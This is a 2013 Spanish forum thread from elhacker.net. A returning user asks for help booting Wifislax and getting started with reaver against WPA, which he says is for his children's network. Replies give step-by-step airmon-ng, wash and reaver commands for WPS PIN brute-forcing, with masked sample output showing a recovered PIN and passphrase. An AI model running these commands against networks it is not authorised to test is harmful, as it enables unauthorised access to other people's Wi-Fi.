elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2  (Leído 3,068 veces)
rockeropasiempre


Desconectado Desconectado

Mensajes: 1.503



Ver Perfil WWW
Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
« en: 7 Marzo 2013, 06:37 am »

A la paz de dios queridos compañeros, ya hacía que no pasaba yo por aquí, pero por motivos personales, económicos y colegiales, ando mas pillao que las pinzas.
Al lio, que el titulo del asunto no dice mucho de lo que ando buscando, explicome:

Vereis, ando con la 4.2 que bajé hace ya un tiempo, para verificar las WEP, sin problem, porque yo ando con mi método tradicional de siempre, y esta versión del slax ofrece muchas mas posiblidades que aquel 3.1.

Problemas:

1- no consigo arrancar el 4.2 en mi máquina, a esta le metí una ati algo medianamente potente, y ya de primeras, no se que pasa que no puedo tirar con el aquí. Incluso el antiguo 3.1 se me queda la pantalla en blanco y no tengo pilotes a arrancar en el ordenador que lo hice siempre. Es decir que no consigo que me arranque el 4.2 en mi máquina. He probado incluso en Vesa a ver si en la versión básica me tiraba, pero nasti.

2. Funciono con el 4.2 en un ordenador que tengo aparte en otra habitación, que es un pentium 4 básico de gráfica y ahí sin problema ninguno. Arranca, verifico y comprueblo la vulnerabilidad de una web que les tenía puesto a los niños y la salta sin problema. Por eso voy a cifrar en WPA el de los crios y quiero comprobar igualmente.

3. Aquí el kit de la cuestión. Me llegaron rumores de que el reaver dentro de la distro está bastante bien, pero como llevo cerca de 4 años lo menos que no toco nada de esto, me habeis pasado por encima cabrones como un tren de mercancias, y no se por donde co.... empezar.

Nada lo dicho, que busco un empujón, en cuanto al tema este, para ver por donde puedo empezar a meterle mano a las Wpa desde el reaver, como siempre, no mascado, pero si haber si teneis un tuto por aquí de aquellos mascadillos que se impartian, como el famoso tuto del 3.1, que estaba explicado casi pa niños. Yo he estado mirando, pero amigos, me pierdo, no se por donde empezar.

Por otro lado me gustaría hacer las cosas desde mi máquina pero el problema como dije es el tema de que no me arranca, el slax 3.1 pega pantallazo en blanco de primeras, y el 4.2 que es el que me interesa arrancar, no hay forma porque tarda y tarda, y a lo ultimo, empieza a lanzar un error numerado donde se queda y ya no hay mas tu tia.


Cualquier ayuda o sugerencia al respecto, agradecido de antemano.
Madre mia, que recuerdos trae esto de los cabezazos que me di al principio y los codos hincados noches y noches pa entender aquel 3.1.



Saludos y gracias nuevamente
« Última modificación: 7 Marzo 2013, 10:52 am por ChimoC » En línea


Piensa, cree, sueña y atrévete
Wifislax Básico
Wifislax Avanzado
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.129


Paz, dignidad y justicia


Ver Perfil
Re: Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
« Respuesta #1 en: 7 Marzo 2013, 10:59 am »

Buenasssss:

Cuanto tiempo sin verte "madikita", espero que la vida te vaya dejando un poco de respiro.

En cuanto al arranque de Wifislax 4.2, no tengo ni la más remota idea de porqué te da errores con el otro portatil.... voy a ver si le paso tu error a USUARIONUEVO.

Aunque recuerda que ahora tienes WS 4.3 que lleva mejoras... así que descárgate esta última

Con referencia a REAVER

El uso es MUY fácil

Abres una shell y tecleas

1.- airmon-ng start INTERFAZ

2.- Te creará la mon0

3.- Wash --> Lo que hará es detectar qué APs pudiesen ser vulnerables

Walsh v1.3

Required Arguments:
 -i, --interface=<iface> Interface to capture packets on
 -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
 -c, --channel=<num> Channel to listen on [auto]
 -o, --out-file=<file> Write data to file
 -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
 -C, --ignore-fcs Ignore frame checksum errors
 -5, --5ghz Use 5GHz 802.11 channels
 -s, --scan Use scan mode
 -u, --survey Use survey mode [default]
 -h, --help Show help

Ejemplo de uso: wash -i mon0

Scanning for supported APs...

00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX

Lo paras con control+c

4.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)

Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv

Resultado

    94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
    WPS PIN: '5XXXXXXX'
    WPA PSK: '1XXXXXXXXX'
    AP SSID: 'ONOXXXX'

Si tecleas

reaver --man te saldrán más opciones

Un saludo y cuidate

ChimoC
En línea

rockeropasiempre


Desconectado Desconectado

Mensajes: 1.503



Ver Perfil WWW
Re: Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
« Respuesta #2 en: 7 Marzo 2013, 12:14 pm »

Buenasssss:

Cuanto tiempo sin verte "madikita", espero que la vida te vaya dejando un poco de respiro.

 :xD :xD, ya te digo, pero muuuuucho tiempo. Esto de hacerse mayor no perdona, y no lo digo por los años, sino por las obligaciones.

Pues entrando en materia, te comento, que colgaré alguna fotillo para que veais aunque sea por curiosidad los pantallazos en mi maquina del 3.1 y del 4.2. ¿Porque?, pos ni idea, imagino que tendrá que ver con la gráfica o alguna otra cosa que tenga enchufá.

Lo del river me quedo con ello, aunque te digo la verdad siempre tuve problemas con estas historias que meteis los que le dais al linux de bellón. Me refiero a cosas como estas:


3.- Wash --> Lo que hará es detectar qué APs pudiesen ser vulnerables

Walsh v1.3

Required Arguments:
 -i, --interface=<iface> Interface to capture packets on
 -f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files

Optional Arguments:
 -c, --channel=<num> Channel to listen on [auto]
 -o, --out-file=<file> Write data to file
 -n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
 -C, --ignore-fcs Ignore frame checksum errors
 -5, --5ghz Use 5GHz 802.11 channels
 -s, --scan Use scan mode
 -u, --survey Use survey mode [default]
 -h, --help Show help

Pero bueno, iré desgranando porque ahora algo mas de tiempo, gracias al gobierno si que tengo. Y máquinas para arreglar tampoco que me entren muchas ultimamente, asín que a ponerme al día.


Un saludete y gracias
En línea


Piensa, cree, sueña y atrévete
Wifislax Básico
Wifislax Avanzado
HalconEye

Desconectado Desconectado

Mensajes: 154


Ver Perfil
Re: Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
« Respuesta #3 en: 7 Marzo 2013, 13:42 pm »

Una vez descargado e instalado reaver....abres consola para comprobar qué routers son vulnerables por wpa activado....wash es una aplicación que te permite comprobarlo...una vez puesta la tarjeta en modo monitor:
# sudo wash -i mon0

te aparecerá una lista de ap's posiblemente vulnerables a reaver.
Después eliges mac a atacar y a funcionar.
Esto es lo más básico...tarda horas si el ataque tiene éxito

# sudo sudo reaver -i mon0 -b 00:1A:2B:XX:XX:XX  -v

http://code.google.com/p/reaver-wps/wiki/README
En línea

Todo lo que digan que somos,
lo somos y aún peor.
rockeropasiempre


Desconectado Desconectado

Mensajes: 1.503



Ver Perfil WWW
Re: Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
« Respuesta #4 en: 7 Marzo 2013, 19:52 pm »

Buenas de nuevo. Lo prometido es deuda, aquí dejo las fotos de lo que ocurre con el slax 3.1 y con el 4.2. Tengo que decir de antemano que este pc de sobremesa es donde siempre trabajé con el 3.1, pero no se porque motivo ahora ni pirula ese ni el 4.2.
Yo apuesto que tiene que ser por la gráfica, porque es lo único que cambié hace ya tiempo, es una ATI Radeon HD 4350 (RV710).

Con el slax 3.1, sucede esto:



Donde debía de aparecer el logo ya, lo que aparece es la pantalla blanca, pero blanca blanca, y luego se queda como en la segunda imagen.

Con el slax 4.2, sucede lo siguiente:

 

Ahí se queda dando errores mas de 20 minutos, y al final canta ERROR, y pantallazo negro.

Tengo que decir Chimoc, que ya he probado el 4.3 y con este nada de nada.
Los dos anteriores, si los pruebo en otro sobremesa que tengo por ahí, que ni tiene gráfica ni tiene naa de na, ahí si que va, porque es una gráfica de lo mas básico.


Un saludo





En línea


Piensa, cree, sueña y atrévete
Wifislax Básico
Wifislax Avanzado
rockeropasiempre


Desconectado Desconectado

Mensajes: 1.503



Ver Perfil WWW
Re: Necesito un empujoncito de nuevo compañeros: WPA con reaver y arranque de WS 4.2
« Respuesta #5 en: 8 Marzo 2013, 08:38 am »

Buenos dias. He visto que las capturas, o por lo menos eso me ha parecido a mi, los guardaba en un lado que ponía modules. Me podiais decir donde exactamente la puedo encontrar para guardar en disco y luego si tal, continuar con ello si interesa. He conseguido llegar hasta ello, dando en la opción buscar, pero quiero saber como llegar por mi propio pie hasta dicha carpeta o ubicación.





Saludos.
Pd. ¿Quien es ese que ha puesto ahí un anuncio de una tablet?  :-\
En línea


Piensa, cree, sueña y atrévete
Wifislax Básico
Wifislax Avanzado
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Reaver Pro [Reaver-WPS Pro Edition Live DVD] « 1 2 ... 9 10 »
Wireless en Linux
P4nd3m0n1um 96 98,846 Último mensaje 11 Agosto 2015, 21:28 pm
por tuamigo84
Compañeros necesito ayuda
Ingeniería Inversa
suicidexcode 4 7,069 Último mensaje 27 Noviembre 2014, 12:14 pm
por .:UND3R:.
Desinstalar reaver 1.4 e instalar reaver 1.3 en wifislax
Wireless en Linux
fjarias 5 7,690 Último mensaje 31 Octubre 2012, 21:24 pm
por MEGAHOM
Reaver Automated Scripts (Scripts de Automatización de Reaver-WPS)
Wireless en Linux
P4nd3m0n1um 0 10,631 Último mensaje 11 Noviembre 2012, 04:34 am
por P4nd3m0n1um
Necesito ayuda compañeros (problemas con los DNS)
Windows
xXSniperXx 5 2,705 Último mensaje 14 Junio 2015, 20:07 pm
por xXSniperXx
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines